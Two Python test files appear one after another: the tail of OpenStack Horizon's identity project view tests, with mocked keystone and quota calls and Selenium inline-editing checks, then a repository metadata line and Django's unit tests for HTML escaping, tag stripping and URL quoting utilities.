url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertMessageCount(error=0, warning=1)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.neutron: ('is_extension_supported',
'tenant_quota_get',
'tenant_quota_update')})
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_update_project_save_with_neutron(self):
quota_data = self.neutron_quotas.first()
neutron_updated_quota = dict([(key, quota_data.get(key).limit)
for key in quotas.NEUTRON_QUOTA_FIELDS])
api.neutron.is_extension_supported(IsA(http.HttpRequest), 'quotas') \
.MultipleTimes().AndReturn(True)
api.neutron.tenant_quota_get(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota_data)
api.neutron.tenant_quota_update(IsA(http.HttpRequest),
self.tenant.id,
**neutron_updated_quota)
self.test_update_project_save(neutron=True)
@test.create_stubs({api.keystone: ('tenant_get',)})
def test_update_project_get_error(self):
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.keystone: ('tenant_get',
'domain_get',
'tenant_update',
'get_default_role',
'roles_for_user',
'remove_tenant_user',
'add_tenant_user_role',
'user_list',
'roles_for_group',
'remove_group_role',
'add_group_role',
'group_list',
'role_list',
'role_assignments_list'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas',
'tenant_quota_usages',),
api.nova: ('tenant_quota_update',)})
def test_update_project_tenant_update_error(self):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
proj_users = self._get_proj_users(project.id)
role_assignments = self.role_assignments.list()
quota_usages = self.quota_usages.first()
# get/init
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
workflow_data = {}
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
role_ids = [role.id for role in roles]
for user in proj_users:
if role_ids:
workflow_data.setdefault(USER_ROLE_PREFIX + role_ids[0], []) \
.append(user.id)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
role_ids = [role.id for role in roles]
for group in groups:
if role_ids:
workflow_data.setdefault(GROUP_ROLE_PREFIX + role_ids[0], []) \
.append(group.id)
# update some fields
project._info["domain_id"] = domain_id
project._info["name"] = "updated name"
project._info["description"] = "updated description"
quota.metadata_items = 444
quota.volumes = 444
updated_project = {"name": project._info["name"],
"description": project._info["description"],
"enabled": project.enabled}
updated_quota = self._get_quota_info(quota)
# handle
quotas.tenant_quota_usages(IsA(http.HttpRequest), tenant_id=project.id) \
.AndReturn(quota_usages)
api.keystone.tenant_update(IsA(http.HttpRequest),
project.id,
**updated_project) \
.AndRaise(self.exceptions.keystone)
self.mox.ReplayAll()
# submit form data
project_data = {"domain_id": project._info["domain_id"],
"name": project._info["name"],
"id": project.id,
"description": project._info["description"],
"enabled": project.enabled}
workflow_data.update(project_data)
workflow_data.update(updated_quota)
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.keystone: ('tenant_get',
'domain_get',
'tenant_update',
'get_default_role',
'roles_for_user',
'remove_tenant_user_role',
'add_tenant_user_role',
'user_list',
'roles_for_group',
'remove_group_role',
'add_group_role',
'group_list',
'role_list',
'role_assignments_list'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas',
'tenant_quota_usages',),
api.nova: ('tenant_quota_update',)})
def test_update_project_quota_update_error(self):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
proj_users = self._get_proj_users(project.id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
role_assignments = self._get_proj_role_assignment(project.id)
quota_usages = self.quota_usages.first()
# get/init
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
workflow_data = {}
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
workflow_data[USER_ROLE_PREFIX + "1"] = ['1', '3'] # admin role
workflow_data[USER_ROLE_PREFIX + "2"] = ['1', '2', '3'] # member role
# Group role assignment data
workflow_data[GROUP_ROLE_PREFIX + "1"] = ['1', '3'] # admin role
workflow_data[GROUP_ROLE_PREFIX + "2"] = ['1', '2', '3'] # member role
# update some fields
project._info["domain_id"] = domain_id
project._info["name"] = "updated name"
project._info["description"] = "updated description"
quota[0].limit = 444
quota[1].limit = -1
updated_project = {"name": project._info["name"],
"description": project._info["description"],
"enabled": project.enabled}
updated_quota = self._get_quota_info(quota)
# handle
api.keystone.tenant_update(IsA(http.HttpRequest),
project.id,
**updated_project) \
.AndReturn(project)
self._check_role_list(keystone_api_version, role_assignments, groups,
proj_users, roles, workflow_data)
quotas.tenant_quota_usages(IsA(http.HttpRequest), tenant_id=project.id) \
.AndReturn(quota_usages)
nova_updated_quota = dict([(key, updated_quota[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
# submit form data
project_data = {"domain_id": project._info["domain_id"],
"name": project._info["name"],
"id": project.id,
"description": project._info["description"],
"enabled": project.enabled}
workflow_data.update(project_data)
workflow_data.update(updated_quota)
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertMessageCount(error=2, warning=1)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.keystone: ('tenant_get',
'domain_get',
'tenant_update',
'get_default_role',
'roles_for_user',
'remove_tenant_user_role',
'add_tenant_user_role',
'user_list',
'roles_for_group',
'remove_group_role',
'add_group_role',
'group_list',
'role_list',
'role_assignments_list'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas',
'tenant_quota_usages')})
def test_update_project_member_update_error(self):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
proj_users = self._get_proj_users(project.id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
role_assignments = self._get_proj_role_assignment(project.id)
quota_usages = self.quota_usages.first()
# get/init
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
workflow_data = {}
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
workflow_data[USER_ROLE_PREFIX + "1"] = ['1', '3'] # admin role
workflow_data[USER_ROLE_PREFIX + "2"] = ['1', '2', '3'] # member role
workflow_data[GROUP_ROLE_PREFIX + "1"] = ['1', '3'] # admin role
workflow_data[GROUP_ROLE_PREFIX + "2"] = ['1', '2', '3'] # member role
# update some fields
project._info["domain_id"] = domain_id
project._info["name"] = "updated name"
project._info["description"] = "updated description"
quota.metadata_items = 444
quota.volumes = 444
updated_project = {"name": project._info["name"],
"description": project._info["description"],
"enabled": project.enabled}
updated_quota = self._get_quota_info(quota)
# handle
quotas.tenant_quota_usages(IsA(http.HttpRequest), tenant_id=project.id) \
.AndReturn(quota_usages)
api.keystone.tenant_update(IsA(http.HttpRequest),
project.id,
**updated_project) \
.AndReturn(project)
self._check_role_list(keystone_api_version, role_assignments, groups,
proj_users, roles, workflow_data)
self.mox.ReplayAll()
# submit form data
project_data = {"domain_id": project._info["domain_id"],
"name": project._info["name"],
"id": project.id,
"description": project._info["description"],
"enabled": project.enabled}
workflow_data.update(project_data)
workflow_data.update(updated_quota)
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertMessageCount(error=2, warning=1)
self.assertRedirectsNoFollow(res, INDEX_URL)
    # Django 1.7 and later do not handle the keystoneclient exception
    # raised here well enough.
    # TODO(mrunge): re-check when django-1.8 is stable
@unittest.skipIf(django.VERSION >= (1, 7, 0),
'Currently skipped with Django >= 1.7')
@test.create_stubs({api.keystone: ('get_default_role',
'tenant_get',
'domain_get'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas')})
def test_update_project_when_default_role_does_not_exist(self):
project = self.tenants.first()
domain_id = project.domain_id
quota = self.quotas.first()
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(None) # Default role doesn't exist
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
try:
# Avoid the log message in the test output when the workflow's
# step action cannot be instantiated
logging.disable(logging.ERROR)
with self.assertRaises(exceptions.NotFound):
self.client.get(url)
finally:
logging.disable(logging.NOTSET)
class UsageViewTests(test.BaseAdminViewTests):
def _stub_nova_api_calls(self, nova_stu_enabled=True):
self.mox.StubOutWithMock(api.nova, 'usage_get')
self.mox.StubOutWithMock(api.nova, 'tenant_absolute_limits')
self.mox.StubOutWithMock(api.nova, 'extension_supported')
self.mox.StubOutWithMock(api.cinder, 'tenant_absolute_limits')
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(nova_stu_enabled)
def _stub_neutron_api_calls(self, neutron_sg_enabled=True):
self.mox.StubOutWithMock(api.neutron, 'is_extension_supported')
self.mox.StubOutWithMock(api.network, 'floating_ip_supported')
self.mox.StubOutWithMock(api.network, 'tenant_floating_ip_list')
if neutron_sg_enabled:
self.mox.StubOutWithMock(api.network, 'security_group_list')
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'security-group').AndReturn(neutron_sg_enabled)
api.network.floating_ip_supported(IsA(http.HttpRequest)) \
.AndReturn(True)
api.network.tenant_floating_ip_list(IsA(http.HttpRequest)) \
.AndReturn(self.floating_ips.list())
if neutron_sg_enabled:
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.q_secgroups.list())
def test_usage_csv(self):
self._test_usage_csv(nova_stu_enabled=True)
def test_usage_csv_disabled(self):
self._test_usage_csv(nova_stu_enabled=False)
def _test_usage_csv(self, nova_stu_enabled=True):
now = timezone.now()
usage_obj = api.nova.NovaUsage(self.usages.first())
self._stub_nova_api_calls(nova_stu_enabled)
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(nova_stu_enabled)
start = datetime.datetime(now.year, now.month, 1, 0, 0, 0, 0)
end = datetime.datetime(now.year, now.month, now.day, 23, 59, 59, 0)
if nova_stu_enabled:
api.nova.usage_get(IsA(http.HttpRequest),
self.tenant.id,
start, end).AndReturn(usage_obj)
api.nova.tenant_absolute_limits(IsA(http.HttpRequest))\
.AndReturn(self.limits['absolute'])
api.cinder.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.cinder_limits['absolute'])
self._stub_neutron_api_calls()
self.mox.ReplayAll()
project_id = self.tenants.first().id
csv_url = reverse('horizon:identity:projects:usage',
args=[project_id]) + "?format=csv"
res = self.client.get(csv_url)
self.assertTemplateUsed(res, 'project/overview/usage.csv')
self.assertTrue(isinstance(res.context['usage'], usage.ProjectUsage))
hdr = ('Instance Name,VCPUs,RAM (MB),Disk (GB),Usage (Hours),'
'Time since created (Seconds),State')
self.assertContains(res, '%s\r\n' % hdr)
class DetailProjectViewTests(test.BaseAdminViewTests):
@test.create_stubs({api.keystone: ('tenant_get',)})
def test_detail_view(self):
project = self.tenants.first()
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id) \
.AndReturn(project)
self.mox.ReplayAll()
res = self.client.get(PROJECT_DETAIL_URL, args=[project.id])
self.assertTemplateUsed(res, 'identity/projects/detail.html')
self.assertEqual(res.context['project'].name, project.name)
self.assertEqual(res.context['project'].id, project.id)
self.assertContains(res, "Project Details: %s" % project.name,
1, 200)
@test.create_stubs({api.keystone: ('tenant_get',)})
def test_detail_view_with_exception(self):
project = self.tenants.first()
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id) \
.AndRaise(self.exceptions.keystone)
self.mox.ReplayAll()
res = self.client.get(PROJECT_DETAIL_URL, args=[project.id])
self.assertRedirectsNoFollow(res, INDEX_URL)
@unittest.skipUnless(os.environ.get('WITH_SELENIUM', False),
"The WITH_SELENIUM env variable is not set.")
class SeleniumTests(test.SeleniumAdminTestCase):
@test.create_stubs(
{api.keystone: ('tenant_list', 'tenant_get', 'tenant_update')})
def test_inline_editing_update(self):
# Tenant List
api.keystone.tenant_list(IgnoreArg(),
domain=None,
marker=None,
paginate=True) \
.AndReturn([self.tenants.list(), False])
        # Edit mode
api.keystone.tenant_get(IgnoreArg(),
u'1',
admin=True) \
.AndReturn(self.tenants.list()[0])
# Update - requires get and update
api.keystone.tenant_get(IgnoreArg(),
u'1',
admin=True) \
.AndReturn(self.tenants.list()[0])
api.keystone.tenant_update(
IgnoreArg(),
u'1',
description='a test tenant.',
enabled=True,
name=u'Changed test_tenant')
# Refreshing cell with changed name
changed_tenant = copy.copy(self.tenants.list()[0])
changed_tenant.name = u'Changed test_tenant'
api.keystone.tenant_get(IgnoreArg(),
u'1',
admin=True) \
.AndReturn(changed_tenant)
self.mox.ReplayAll()
self.selenium.get("%s%s" % (self.live_server_url, INDEX_URL))
# Check the presence of the important elements
td_element = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']")
cell_wrapper = td_element.find_element_by_class_name(
'table_cell_wrapper')
edit_button_wrapper = td_element.find_element_by_class_name(
'table_cell_action')
edit_button = edit_button_wrapper.find_element_by_tag_name('button')
# Hovering over td and clicking on edit button
action_chains = ActionChains(self.selenium)
action_chains.move_to_element(cell_wrapper).click(edit_button)
action_chains.perform()
        # Waiting for the AJAX response for switching to editing mode
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: self.selenium.find_element_by_name("name__1"))
# Changing project name in cell form
td_element = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']")
name_input = td_element.find_element_by_tag_name('input')
name_input.send_keys(keys.Keys.HOME)
name_input.send_keys("Changed ")
# Saving new project name by AJAX
td_element.find_element_by_class_name('inline-edit-submit').click()
# Waiting for the AJAX response of cell refresh
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']"
"/div[@class='table_cell_wrapper']"
"/div[@class='table_cell_data_wrapper']"))
# Checking new project name after cell refresh
data_wrapper = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']"
"/div[@class='table_cell_wrapper']"
"/div[@class='table_cell_data_wrapper']")
self.assertTrue(data_wrapper.text == u'Changed test_tenant',
"Error: saved tenant name is expected to be "
"'Changed test_tenant'")
@test.create_stubs(
{api.keystone: ('tenant_list', 'tenant_get')})
def test_inline_editing_cancel(self):
# Tenant List
api.keystone.tenant_list(IgnoreArg(),
domain=None,
marker=None,
paginate=True) \
.AndReturn([self.tenants.list(), False])
        # Edit mode
api.keystone.tenant_get(IgnoreArg(),
u'1',
admin=True) \
.AndReturn(self.tenants.list()[0])
        # Cancelling edit mode does not send a request
self.mox.ReplayAll()
self.selenium.get("%s%s" % (self.live_server_url, INDEX_URL))
# Check the presence of the important elements
td_element = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']")
cell_wrapper = td_element.find_element_by_class_name(
'table_cell_wrapper')
edit_button_wrapper = td_element.find_element_by_class_name(
'table_cell_action')
edit_button = edit_button_wrapper.find_element_by_tag_name('button')
# Hovering over td and clicking on edit
action_chains = ActionChains(self.selenium)
action_chains.move_to_element(cell_wrapper).click(edit_button)
action_chains.perform()
        # Waiting for the AJAX response for switching to editing mode
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: self.selenium.find_element_by_name("name__1"))
# Click on cancel button
td_element = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']")
td_element.find_element_by_class_name('inline-edit-cancel').click()
# Cancel is via javascript, so it should be immediate
# Checking that tenant name is not changed
data_wrapper = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']"
"/div[@class='table_cell_wrapper']"
"/div[@class='table_cell_data_wrapper']")
self.assertTrue(data_wrapper.text == u'test_tenant',
"Error: saved tenant name is expected to be "
"'test_tenant'")
@test.create_stubs({api.keystone: ('get_default_domain',
'get_default_role',
'user_list',
'group_list',
'role_list'),
api.base: ('is_service_enabled',),
quotas: ('get_default_quota_data',)})
def test_membership_list_loads_correctly(self):
member_css_class = ".available_members"
users = self.users.list()
api.base.is_service_enabled(IsA(http.HttpRequest), 'network') \
.MultipleTimes().AndReturn(False)
api.base.is_service_enabled(IsA(http.HttpRequest), 'volume') \
.MultipleTimes().AndReturn(False)
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(self.domain)
quotas.get_default_quota_data(IsA(http.HttpRequest)) \
.AndReturn(self.quotas.first())
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(self.roles.first())
api.keystone.user_list(IsA(http.HttpRequest), domain=self.domain.id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.AndReturn(self.roles.list())
api.keystone.group_list(IsA(http.HttpRequest), domain=self.domain.id) \
.AndReturn(self.groups.list())
api.keystone.role_list(IsA(http.HttpRequest)) \
.AndReturn(self.roles.list())
self.mox.ReplayAll()
self.selenium.get("%s%s" %
(self.live_server_url,
reverse('horizon:identity:projects:create')))
members = self.selenium.find_element_by_css_selector(member_css_class)
for user in users:
self.assertIn(user.name, members.text)
|
apache-2.0
|
wfxiang08/django190
|
tests/utils_tests/test_html.py
|
34
|
10708
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from datetime import datetime
from django.test import SimpleTestCase, ignore_warnings
from django.utils import html, safestring, six
from django.utils._os import upath
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import force_text
class TestUtilsHtml(SimpleTestCase):
def check_output(self, function, value, output=None):
"""
Check that function(value) equals output. If output is None,
check that function(value) equals value.
"""
if output is None:
output = value
self.assertEqual(function(value), output)
def test_escape(self):
f = html.escape
items = (
            ('&', '&amp;'),
            ('<', '&lt;'),
            ('>', '&gt;'),
            ('"', '&quot;'),
            ("'", '&#39;'),
)
# Substitution patterns for testing the above items.
patterns = ("%s", "asdf%sfdsa", "%s1", "1%sb")
for value, output in items:
for pattern in patterns:
self.check_output(f, pattern % value, pattern % output)
# Check repeated values.
self.check_output(f, value * 2, output * 2)
# Verify it doesn't double replace &.
        self.check_output(f, '<&', '&lt;&amp;')
def test_format_html(self):
self.assertEqual(
html.format_html("{} {} {third} {fourth}",
"< Dangerous >",
html.mark_safe("<b>safe</b>"),
third="< dangerous again",
fourth=html.mark_safe("<i>safe again</i>")
                             ),
            "&lt; Dangerous &gt; <b>safe</b> &lt; dangerous again <i>safe again</i>"
        )
def test_linebreaks(self):
f = html.linebreaks
items = (
("para1\n\npara2\r\rpara3", "<p>para1</p>\n\n<p>para2</p>\n\n<p>para3</p>"),
("para1\nsub1\rsub2\n\npara2", "<p>para1<br />sub1<br />sub2</p>\n\n<p>para2</p>"),
("para1\r\n\r\npara2\rsub1\r\rpara4", "<p>para1</p>\n\n<p>para2<br />sub1</p>\n\n<p>para4</p>"),
("para1\tmore\n\npara2", "<p>para1\tmore</p>\n\n<p>para2</p>"),
)
for value, output in items:
self.check_output(f, value, output)
def test_strip_tags(self):
f = html.strip_tags
items = (
            ('<p>See: &#39;&eacute; is an apostrophe followed by e acute</p>',
             'See: &#39;&eacute; is an apostrophe followed by e acute'),
('<adf>a', 'a'),
('</adf>a', 'a'),
('<asdf><asdf>e', 'e'),
('hi, <f x', 'hi, <f x'),
('234<235, right?', '234<235, right?'),
('a4<a5 right?', 'a4<a5 right?'),
('b7>b2!', 'b7>b2!'),
('</fe', '</fe'),
('<x>b<y>', 'b'),
('a<p onclick="alert(\'<test>\')">b</p>c', 'abc'),
('a<p a >b</p>c', 'abc'),
('d<a:b c:d>e</p>f', 'def'),
('<strong>foo</strong><a href="http://example.com">bar</a>', 'foobar'),
# caused infinite loop on Pythons not patched with
# http://bugs.python.org/issue20288
('&gotcha&#;<>', '&gotcha&#;<>'),
)
for value, output in items:
self.check_output(f, value, output)
# Some convoluted syntax for which parsing may differ between python versions
output = html.strip_tags('<sc<!-- -->ript>test<<!-- -->/script>')
self.assertNotIn('<script>', output)
self.assertIn('test', output)
output = html.strip_tags('<script>alert()</script>&h')
self.assertNotIn('<script>', output)
self.assertIn('alert()', output)
# Test with more lengthy content (also catching performance regressions)
for filename in ('strip_tags1.html', 'strip_tags2.txt'):
path = os.path.join(os.path.dirname(upath(__file__)), 'files', filename)
with open(path, 'r') as fp:
content = force_text(fp.read())
start = datetime.now()
stripped = html.strip_tags(content)
elapsed = datetime.now() - start
self.assertEqual(elapsed.seconds, 0)
self.assertIn("Please try again.", stripped)
self.assertNotIn('<', stripped)
def test_strip_spaces_between_tags(self):
f = html.strip_spaces_between_tags
# Strings that should come out untouched.
items = (' <adf>', '<adf> ', ' </adf> ', ' <f> x</f>')
for value in items:
self.check_output(f, value)
# Strings that have spaces to strip.
items = (
('<d> </d>', '<d></d>'),
('<p>hello </p>\n<p> world</p>', '<p>hello </p><p> world</p>'),
('\n<p>\t</p>\n<p> </p>\n', '\n<p></p><p></p>\n'),
)
for value, output in items:
self.check_output(f, value, output)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_strip_entities(self):
f = html.strip_entities
# Strings that should come out untouched.
values = ("&", "&a", "&a", "a&#a")
for value in values:
self.check_output(f, value)
# Valid entities that should be stripped from the patterns.
        entities = ("&#1;", "&#12;", "&a;", "&fdasdfasdfasdf;")
        patterns = (
            ("asdf %(entity)s ", "asdf  "),
            ("%(entity)s%(entity)s", ""),
            ("&%(entity)s%(entity)s", "&"),
            ("%(entity)s3", "3"),
        )
for entity in entities:
for in_pattern, output in patterns:
self.check_output(f, in_pattern % {'entity': entity}, output)
def test_escapejs(self):
f = html.escapejs
items = (
('"double quotes" and \'single quotes\'', '\\u0022double quotes\\u0022 and \\u0027single quotes\\u0027'),
(r'\ : backslashes, too', '\\u005C : backslashes, too'),
('and lots of whitespace: \r\n\t\v\f\b', 'and lots of whitespace: \\u000D\\u000A\\u0009\\u000B\\u000C\\u0008'),
(r'<script>and this</script>', '\\u003Cscript\\u003Eand this\\u003C/script\\u003E'),
('paragraph separator:\u2029and line separator:\u2028', 'paragraph separator:\\u2029and line separator:\\u2028'),
)
for value, output in items:
self.check_output(f, value, output)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_remove_tags(self):
f = html.remove_tags
items = (
("<b><i>Yes</i></b>", "b i", "Yes"),
("<a>x</a> <p><b>y</b></p>", "a b", "x <p>y</p>"),
)
for value, tags, output in items:
self.assertEqual(f(value, tags), output)
def test_smart_urlquote(self):
quote = html.smart_urlquote
# Ensure that IDNs are properly quoted
self.assertEqual(quote('http://öäü.com/'), 'http://xn--4ca9at.com/')
self.assertEqual(quote('http://öäü.com/öäü/'), 'http://xn--4ca9at.com/%C3%B6%C3%A4%C3%BC/')
# Ensure that everything unsafe is quoted, !*'();:@&=+$,/?#[]~ is considered safe as per RFC
self.assertEqual(quote('http://example.com/path/öäü/'), 'http://example.com/path/%C3%B6%C3%A4%C3%BC/')
self.assertEqual(quote('http://example.com/%C3%B6/ä/'), 'http://example.com/%C3%B6/%C3%A4/')
self.assertEqual(quote('http://example.com/?x=1&y=2+3&z='), 'http://example.com/?x=1&y=2+3&z=')
self.assertEqual(quote('http://example.com/?x=<>"\''), 'http://example.com/?x=%3C%3E%22%27')
self.assertEqual(quote('http://example.com/?q=http://example.com/?x=1%26q=django'),
'http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango')
self.assertEqual(quote('http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango'),
'http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango')
def test_conditional_escape(self):
s = '<h1>interop</h1>'
        self.assertEqual(html.conditional_escape(s),
                         '&lt;h1&gt;interop&lt;/h1&gt;')
self.assertEqual(html.conditional_escape(safestring.mark_safe(s)), s)
def test_html_safe(self):
@html.html_safe
class HtmlClass(object):
if six.PY2:
def __unicode__(self):
return "<h1>I'm a html class!</h1>"
else:
def __str__(self):
return "<h1>I'm a html class!</h1>"
html_obj = HtmlClass()
self.assertTrue(hasattr(HtmlClass, '__html__'))
self.assertTrue(hasattr(html_obj, '__html__'))
self.assertEqual(force_text(html_obj), html_obj.__html__())
def test_html_safe_subclass(self):
if six.PY2:
class BaseClass(object):
def __html__(self):
# defines __html__ on its own
return 'some html content'
def __unicode__(self):
return 'some non html content'
@html.html_safe
class Subclass(BaseClass):
def __unicode__(self):
# overrides __unicode__ and is marked as html_safe
return 'some html safe content'
else:
class BaseClass(object):
def __html__(self):
# defines __html__ on its own
return 'some html content'
def __str__(self):
return 'some non html content'
@html.html_safe
class Subclass(BaseClass):
def __str__(self):
# overrides __str__ and is marked as html_safe
return 'some html safe content'
subclass_obj = Subclass()
self.assertEqual(force_text(subclass_obj), subclass_obj.__html__())
def test_html_safe_defines_html_error(self):
msg = "can't apply @html_safe to HtmlClass because it defines __html__()."
with self.assertRaisesMessage(ValueError, msg):
@html.html_safe
class HtmlClass(object):
def __html__(self):
return "<h1>I'm a html class!</h1>"
